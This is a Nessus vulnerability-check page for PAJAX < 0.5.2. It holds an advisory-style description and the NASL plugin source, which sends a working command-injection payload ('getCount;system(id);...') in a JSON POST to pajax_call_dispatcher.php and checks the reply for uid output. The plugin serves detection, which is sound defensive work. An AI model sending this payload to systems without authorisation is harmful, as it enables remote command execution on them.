Lucene search
This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.PAJAX_052.NASLHistoryApr 16, 2006 - 12:00 a.m.
PAJAX < 0.5.2 Multiple Vulnerabilities
2006-04-1600:00:00
This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
15
The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript.
The version of PAJAX installed on the remote host fails to validate input to the ‘pajax/pajax_call_dispatcher.php’ script before using it in a PHP ‘eval()’ function. An unauthenticated attacker can exploit this flaw to execute arbitrary command on the remote host subject to the privileges of the web server user id.
In addition, the application also reportedly fails to validate input to classnames before using it in a PHP ‘require()’ function in ‘Pajax.class.php’, which allows for local file include attacks.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21227);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-1551", "CVE-2006-1789");
script_bugtraq_id(17519);
script_name(english:"PAJAX < 0.5.2 Multiple Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is susceptible to
multiple issues.");
script_set_attribute(attribute:"description", value:
"The remote host is running PAJAX, a PHP library for remote
asynchronous objects in JavaScript.
The version of PAJAX installed on the remote host fails to validate
input to the 'pajax/pajax_call_dispatcher.php' script before using it
in a PHP 'eval()' function. An unauthenticated attacker can exploit
this flaw to execute arbitrary command on the remote host subject to
the privileges of the web server user id.
In addition, the application also reportedly fails to validate input
to classnames before using it in a PHP 'require()' function in
'Pajax.class.php', which allows for local file include attacks.");
script_set_attribute(attribute:"see_also", value:"https://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt");
script_set_attribute(attribute:"see_also", value:"http://www.auberger.com/pajax/3/");
script_set_attribute(attribute:"solution", value:
"Upgrade to PAJAX version 0.5.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'PAJAX Remote Command Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/04/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/04/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/pajax", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
url = string(dir, "/pajax/pajax_call_dispatcher.php");
# Check whether the affected script exists.
r = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(r)) exit(0, "The web server did not answer");
res = r[2];
# If it does...
if (res == "null")
{
# Try to exploit the flaw to run a command.
cmd = "id";
postdata = string(
'{',
'"id": "ae9b2743a65c11b856f9ad02b12e5183", ',
'"className": "TestSession", ',
'"method": "getCount;system(', cmd, ');$obj->getCount", ',
'}'
);
r = http_send_recv3(method:"POST", item:url, version: 11, port: port,
add_headers: make_array("Content-Type", "text/json"), data: postdata);
if (isnull(r)) exit(0, "The web server did not answer");
res = r[2];
# There's a problem if we see the code in the XML debug output.
if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res))
{
if (report_verbosity)
{
contents = res - strstr(res, "<br />");
if (isnull(contents)) contents = res;
report = string(
"\n",
"Nessus was able to execute the command '", cmd, "' on the remote host.\n",
"It produced the following output :\n",
"\n",
data_protection::sanitize_uid(output:contents)
);
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
}
Related
securityvulns
securityvulns
packetstorm
packetstorm
PAJAX Remote Command Execution
2009-10-30 00:00:00
pajax-0.5.1.txt
2006-04-17 00:00:00
prion
prion
Directory traversal
2006-04-13 22:02:00
Sql injection
2006-04-13 22:02:00
cve
cve
CVE-2006-1789
2006-04-13 22:02:00
CVE-2006-1551
2006-04-13 22:02:00
Related for PAJAX_052.NASL